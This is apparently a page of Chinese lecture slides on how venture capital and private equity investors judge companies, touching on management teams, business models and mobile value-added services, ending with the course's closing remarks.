都说投资人很挑剔,是的!在你看来习以为常的做法,我们会问你为什么这样做?你这样做的原因是什么?你的第一反应是这么做的效果很好,也不需要投资太大,有很好的毛利。那我们就要接着问你,这个毛利能维持吗?如果多加一点市场渠道的投入,会不会把你的竞争优势巩固得更好? 我们要看的是你的企业三五年内的价值,是不是值得投资?而不是仅看眼前。然而,这些角度企业家往往很难看得这么深入。我们不是来给你捣乱的,但我们这样的工作方式,有些企业家不太理解,而有些企业家非常欢迎 。不 管你 跟 我这 场 恋爱会不会走到婚姻,但是对企业的帮助却会非常大。 你在我们这里拿钱,我这个钱是用来建立我们跟你的中长期战略合作关系,我们的关系变成利益共同体。私募投资人一旦进入你的企业之后,最快退出也需要三年,慢的需要五六年,在这段时间内,我们必须跟你共同把企业做得很健康,把价值释放出来,这样我们才能获得好的收益。 有一些私募基金是看你明年能上市,最晚后年能上市,他进来赚一点快钱,这种情况对你的帮助就有限了。这个选择取决你要什么,你先想清楚你选择私募投资者,除了钱以外最需要什么,然后回头去考察我们,像我们考察你一样。 风投为什么不找你? 有很多企业主动去找风投,风投确实不感兴趣,跟你谈十分钟就觉得没戏。而另一方面,风投们却整天请别的企业主吃饭,希望对方能够接受风投的钱,这里面有一个角度的问题。 很多企业不理解,自己企业这么好,风投他们听了看了怎么都没有反应?我们把企业看成我们的产品,这个产品在未来一段时间内变得更有价值,我们才能转手卖掉他获得价值。 在这当中,有个因素是我们比较看中的,那就是管理团队,即所谓人的因素。尤其在一些新兴行业、消费者行业、IT或者是技术的行业等一些经济领域,这些团队基本上决定了80%的成功率。一些成立时间非常短的公司,在行业里面也有非常好的经验,在三五年创造了很多奇迹,是很多企业家努力二三十年都没有办法达到的。你看到很多成功的中小企业融资,企业规模很小也不挣什么钱,团队的背景非常漂亮,拿到上亿美元的投资,三五年就真的成了行业的领袖。往往是核心团队的能力,人的得分非常高,这个是可遇不可求的。 而在传统行业,企业家的风格相对会保守稳健,传统行业本身的发展规律也是一个稳健的过程,这个过程有一些硬性的规律,很难快速地超越,这就决定了我们要以比较务实的角度去看待他们,把他们去跟同行比。就像我们看农业,这个行业从业人员的素质和商业成熟度相对比较弱,但是只要你在这个行业里面是最好的,这个行业的机会更多会被你把握,你得到风投青睐的机会就更多。 你有“秘密武器”吗? 商业模式始终是跳不开的重要话题。如果商业模式经常变,说明你的企业不成熟,你这个企业往往不可能做大。你要坚持你的东西,当你遇到困难,要学会选择有弹性的躲避和调整,这点也是非常关键的。在不同的细分行业,尤其是电子行业,竞争非常的激烈,如果你没有足够的定力就很难成功。你老是跟着别人后面学,今年一变明年一变,后来会发现你就是追随的受害者。 如果你想赚长远的利润,在同行中要争取更高利润水平,更持续地高水平成长,那你一定有“秘密武器”,这个武器往往会体现在技术上。但是中国公司大多数只是一些技术应用的开发,这很容易遭遇模仿和抄袭。即便这样,如果你能结合你的产品和渠道模式,将其巧妙组合在一起,在加上特定的行业在特定的阶段,往往就保住了机遇,再通过三五年的发展和固化来强化自己的竞争力,那么你的对手也很难将你打败!所谓的竞争力,即是你吸引人才的能力非常强,行业顶尖的人都愿意来跟你一起干,在客户渠道方面,你又比对手超出一大截等等。 中国存在非常复杂的市场结构,造成了很多产业链的某一个节点上会有问题存在,而且一直没有被解决。有的是技术问题,有的是客户服务方式的问题,如果你把这个问题很好地解决,往往也能获得机会。像过去有些行业是被国有企业所控制的资源,效率低,产业价值链存在服务的缺失,后来民营企业在这一块成为主流的力量,这样的机会在未来仍然存在。在中国的经济快速转型成长的过程中,很多市场随之扩大,或者使尚待解决的问题得以解决,从这个角度看也能找到你的机会!有的人在抱怨,而有的人则抓住了机会。 网站盈利除了自身产品售卖,还有就是提供增值服务,和被VC所看中,接受VC的投资。 增值服务(Value-added logistics service) 其核心内容是指根据客户需要,为客户提供的超出常规服务范围的服务,或者采用超出常规的服务方法提供的服务。 按照信息产业部的界定,除话音这项基础业务外,所有的数据业务都属 于增值业务的范畴。 简单地说,也就是手机的新功能。目前的手机增值服务,主要包括移动通信网络上的各种娱乐与通信服务,如铃声、图片、***、新闻、天气预报、屏保和短信等。收费,则按条或按天、按月收。 根据iResearch艾瑞市场咨询的研究统计,2002年,SP移动增值服务市场基本上就是短信市场,当年市场规模为17亿元。
147
结束语 希望通过学习本课程,大家能有所收获。也非常感谢同学们对这门课以及我本人的支持…… 这门课使我们走在一起,有了一段交集……
讲解过程中通过演示、举例、交互式了解等手段,力求突出重点问题的实用性和知识的广度。 希望通过学习本课程,大家能有所收获。也非常感谢同学们对这门课以及我本人的支持…… 这门课使我们走在一起,有了一段交集…… 欢迎经常常联系…… 刘远超
Similar presentations